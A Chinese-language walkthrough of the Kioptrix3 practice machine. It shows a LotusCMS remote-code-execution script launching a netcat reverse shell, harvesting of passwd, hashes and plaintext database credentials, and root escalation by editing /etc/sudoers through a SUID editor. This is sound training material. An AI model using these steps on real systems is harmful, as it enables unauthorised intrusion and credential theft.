这台靶机主要涉及信息收集能力，漏洞利用 getshell 较为简单，提权也并不复杂，最花时间的是从最低权限的 shell 中收集有效信息的过程，其中有些是有效信息有些是无效信息，需要仔细鉴别，防止陷入兔子洞。

Kioptrix1.2靶机

信息收集

web查看

这里先按照vulhub上界面的提示，在hosts文件中加入了相应域名和ip的对应

查看主页面

这个界面中有三处可以跳转的地方，分别对应了blog、login和gallery

这里得到了cms的名字LotusCMS

最有价值的信息就是cms的名字和登录界面

搜索一下这个cms的漏洞

第一个脚本是通过msf利用的，试一下

失败了，去谷歌吧

确实是有这个cms的利用方式的，而且根据靶机的时间判断，应该对应这个漏洞

给了两个文件还有对应的demo视频

那就把sh文件下载下来，然后运行试试，这里只列出文件开头给出的使用方法

# USAGE: ./lotusRCE.sh target lotusCMS-path
# USAGE: ./lotusRCE.sh ki0ptrix3.com /
# USAGE: ./lotusRCE.sh 192.168.1.36 /lcms/
# Enter IP and PORT when asked to spawn netcat based reverse shell ;)

刚开始尝试直接输入NetCat /dev/tcp但是始终没有反应，看了视频才发现，这里原来是输序号的……

反弹shell成功

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443            
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.25.128] from (UNKNOWN) [192.168.25.130] 36437
whoami
www-data

提权

信息收集

来一波信息收集

python -c "import pty;pty.spawn('/bin/bash')"
www-data@Kioptrix3:/home/www/kioptrix3.com$ sudo -l
sudo -l
[sudo] password for www-data: 

www-data@Kioptrix3:/home/www/kioptrix3.com$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:82:a5:78 brd ff:ff:ff:ff:ff:ff
    inet 192.168.25.130/24 brd 192.168.25.255 scope global eth1
    inet6 fe80::20c:29ff:fe82:a578/64 scope link 
       valid_lft forever preferred_lft forever
www-data@Kioptrix3:/home/www/kioptrix3.com$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash
www-data@Kioptrix3:/home/www/kioptrix3.com$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Kioptrix3:/home/www/kioptrix3.com$ uname -a
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
www-data@Kioptrix3:/home/www/kioptrix3.com$ sudo -l
sudo -l
[sudo] password for www-data: 

www-data@Kioptrix3:/home/www/kioptrix3.com$

有个特殊的文件 ht

www-data@Kioptrix3:/home/www/kioptrix3.com$ find / -type f -perm -04000 -ls 2>/dev/null
<w/kioptrix3.com$ find / -type f -perm -04000 -ls 2>/dev/null                
 66011    8 -rwsr-xr-x   1 root     root         4588 Aug 22  2008 /usr/lib/eject/dmcrypt-get-device
 90114  172 -rwsr-xr-x   1 root     root       168340 May 14  2008 /usr/lib/openssh/ssh-keysign
 90491   12 -rwsr-xr--   1 root     www-data    10276 Jun 18  2009 /usr/lib/apache2/suexec
 54187   12 -rwsr-xr-x   1 root     root         9624 Jan 11  2011 /usr/lib/pt_chown
 53422   12 -rwsr-xr-x   1 root     root        11048 Dec 10  2007 /usr/bin/arping
 53651   48 -rwsr-xr-x   1 root     root        46084 Mar 31  2008 /usr/bin/mtr
 50857   20 -rwsr-xr-x   1 root     root        19144 Dec  8  2008 /usr/bin/newgrp
 51026   28 -rwsr-xr-x   1 root     root        28624 Dec  8  2008 /usr/bin/chfn
 51029   40 -rwsr-xr-x   1 root     root        37360 Dec  8  2008 /usr/bin/gpasswd
 52498  112 -rwsr-xr-x   2 root     root       107936 Feb 16  2009 /usr/bin/sudo
 53212   40 -rwsr-sr-x   1 daemon   daemon      38464 Feb 20  2007 /usr/bin/at
 52498  112 -rwsr-xr-x   2 root     root       107936 Feb 16  2009 /usr/bin/sudoedit
 51027   24 -rwsr-xr-x   1 root     root        23952 Dec  8  2008 /usr/bin/chsh
 51030   32 -rwsr-xr-x   1 root     root        29104 Dec  8  2008 /usr/bin/passwd
 53424   16 -rwsr-xr-x   1 root     root        12296 Dec 10  2007 /usr/bin/traceroute6.iputils
 58472 2028 -rwsr-sr-x   1 root     root      2072344 Apr 16  2011 /usr/local/bin/ht
 53710  268 -rwsr-xr--   1 root     dip        269256 Oct  4  2007 /usr/sbin/pppd
 52260   16 -rwsr-sr-x   1 libuuid  libuuid     12336 Mar 27  2008 /usr/sbin/uuidd
582147    4 -rwsr-xr--   1 root     dhcp         2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
196704   20 -rwsr-xr--   1 root     fuse        20056 Feb 26  2008 /bin/fusermount
196667   32 -rwsr-xr-x   1 root     root        30856 Dec 10  2007 /bin/ping
196644   84 -rwsr-xr-x   1 root     root        81368 Sep 26  2008 /bin/mount
196645   68 -rwsr-xr-x   1 root     root        63584 Sep 26  2008 /bin/umount
196668   28 -rwsr-xr-x   1 root     root        26684 Dec 10  2007 /bin/ping6
196641   28 -rwsr-xr-x   1 root     root        25540 Dec  8  2008 /bin/su

找了一圈没发现ht的suid的利用方法，接着信息收集吧

www-data@Kioptrix3:/home/www/kioptrix3.com$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

定时任务里没收获，四处走走看看吧

www-data@Kioptrix3:/home/www/kioptrix3.com/data$ ls -liah
ls -liah
total 36K
631216 drwxrwxrwx  8 root root 4.0K Apr 14  2011 .
630792 drwxr-xr-x  8 root root 4.0K Apr 15  2011 ..
631217 -rwxrwxrwx  1 root root   13 Apr  1  2006 .htaccess
631218 drwxrwxrwx  3 root root 4.0K Apr 14  2011 config
631229 drwxrwxrwx  2 root root 4.0K Apr 14  2011 filebackups
631231 drwxrwxrwx  2 root root 4.0K Apr 14  2011 files
631233 -rwxrwxrwx  1 root root    0 Apr 11  2010 index.php
631234 drwxrwxrwx 10 root root 4.0K Apr 14  2011 modules
631266 drwxrwxrwx  2 root root 4.0K Apr 14  2011 pages
631269 drwxrwxrwx  2 root root 4.0K Apr 14  2011 users
www-data@Kioptrix3:/home/www/kioptrix3.com/data$ cd config
cd config
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ ls -liah
ls -liah
total 36K
631218 drwxrwxrwx 3 root root 4.0K Apr 14  2011 .
631216 drwxrwxrwx 8 root root 4.0K Apr 14  2011 ..
631219 -rwxrwxrwx 1 root root    4 Oct  2  2010 active_design.dat
631220 -rwxrwxrwx 1 root root    0 Apr 11  2010 index.php
631221 drwxrwxrwx 2 root root 4.0K Apr 14  2011 modules
631224 -rwxrwxrwx 1 root root   30 Apr 14  2011 salt.dat
631225 -rwxrwxrwx 1 root root   21 Oct  2  2010 site_description.dat
631226 -rwxrwxrwx 1 root root    8 Oct  2  2010 site_keywords.dat
631227 -rwxrwxrwx 1 root root   15 Apr 14  2011 site_title.dat
631228 -rwxrwxrwx 1 root root    5 Mar 14  2011 site_version.dat

有一些有意思的文件，挨个看看吧

www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ ls
ls
active_design.dat  modules   site_description.dat  site_title.dat
index.php          salt.dat  site_keywords.dat     site_version.dat
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ cat salt.dat
cat salt.dat
gtZBO2PewhZHR10hGXLaSt0Bc5Ub73
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ cat site_description.dat
<w/kioptrix3.com/data/config$ cat site_description.dat                       
Your Site Description
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ cat site_keywords.dat
cat site_keywords.dat
LotusCMS
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ cat index.php
cat index.php
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ cat active_design.dat
cat active_design.dat
grey
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ cat site_version.dat
cat site_version.dat
3.0.5

一是确定了LotusCMS的版本（都已经打进来了，版本号也没什么用了），二是拿到了salt，或许之后用得到。

www-data@Kioptrix3:/home/www/kioptrix3.com/data$ cd users
cd users
www-data@Kioptrix3:/home/www/kioptrix3.com/data/users$ ls -liah
ls -liah
total 12K
631269 drwxrwxrwx 2 root     root     4.0K Apr 14  2011 .
631216 drwxrwxrwx 8 root     root     4.0K Apr 14  2011 ..
631270 -rw-r--r-- 1 www-data www-data   67 Apr 15  2011 admin.dat
631271 -rwxrwxrwx 1 root     root        0 Apr 11  2010 index.php
www-data@Kioptrix3:/home/www/kioptrix3.com/data/users$ cat admin.dat
cat admin.dat
|318d8dd409db395f0317efa71b3bad13e1fb9857|administrator|bla@bla.com
www-data@Kioptrix3:/home/www/kioptrix3.com/data/users$ cat index.php
cat index.php
www-data@Kioptrix3:/home/www/kioptrix3.com/data/users$ 

admin.dat里有密码，尝试在线网站破解失败，尝试一下本地破解？

接着搜集一下信息吧

www-data@Kioptrix3:/home/www/kioptrix3.com$ ls gallery
ls gallery
BACK         gfooter.php     logout.php        readme.html    tags.php
db.sql       gfunctions.php  p.php             recent.php     themes
g.php        gheader.php     photos            register.php   version.txt
gadmin       index.php       photos.php        scopbin        vote.php
gallery.php  install.BAK     post_comment.php  search.php
gconfig.php  login.php       profile.php       slideshow.php
www-data@Kioptrix3:/home/www/kioptrix3.com$ cat ./gallery/gconfig.php
cat ./gallery/gconfig.php
<?php
        error_reporting(0);
        /*
                A sample Gallarific configuration file. You should edit
                the installer details below and save this file as gconfig.php
                Do not modify anything else if you don't know what it is.
        */

        // Installer Details -----------------------------------------------

        // Enter the full HTTP path to your Gallarific folder below,
        // such as http://www.yoursite.com/gallery
        // Do NOT include a trailing forward slash

        $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

        $GLOBALS["gallarific_mysql_server"] = "localhost";
        $GLOBALS["gallarific_mysql_database"] = "gallery";
        $GLOBALS["gallarific_mysql_username"] = "root";
        $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

        // Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
                echo("A connection to the database couldn't be established: " . mysql_error());
                die();
}else {
        if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
                echo("The Gallarific database couldn't be opened: " . mysql_error());
                die();
        }else {
                $settings=mysql_query("select * from gallarific_settings");
                if(mysql_num_rows($settings)!=0){
                        while($data=mysql_fetch_array($settings)){
                                $GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
                        }
                }

        }
}

?>

拿到了数据库的用户名和密码，登录mysql数据库

www-data@Kioptrix3:/home/www/kioptrix3.com$ mysql -u root -p
mysql -u root -p
Enter password: fuckeyou

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 10
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show database;
show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| gallery            | 
| mysql              | 
+--------------------+
3 rows in set (0.00 sec)

mysql> use gallery
use gallery
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------------+
| Tables_in_gallery    |
+----------------------+
| dev_accounts         | 
| gallarific_comments  | 
| gallarific_galleries | 
| gallarific_photos    | 
| gallarific_settings  | 
| gallarific_stats     | 
| gallarific_users     | 
+----------------------+
7 rows in set (0.00 sec)

mysql> select * from gallarific_users
select * from gallarific_users
    -> ;
;
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype  | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
|      1 | admin    | n0t7t1k4 | superuser | Super     | User     |       | 1302628616 |         |           1 |       |          | 
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.01 sec)

mysql> select * from dev_accounts
select * from dev_accounts
    -> ;
;
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
|  1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 | 
|  2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e | 
+----+------------+----------------------------------+
2 rows in set (0.01 sec)

发现了许多东西啊……，admin尝试登录后台失败，下面两个用户登录也失败，尝试一下登录ssh，admin失败，loneferret成功

登录也成功

ht软件编辑器提权

查看当前用户权限，发现ht具有root权限。而且提示我们ht是一个软件编辑器。

apt install terminal.app  # 这里我是安装terminal.app利用的
 
terminal  # 运行
 
出现蓝色界面，按F3，然后输入/etc/sudoers，回车

添加如下图内容，然后按 F2保存，Ctrl+c 退出即可。

重新查看用户权限，发现已经成功添加，sudo执行即可获取root权限。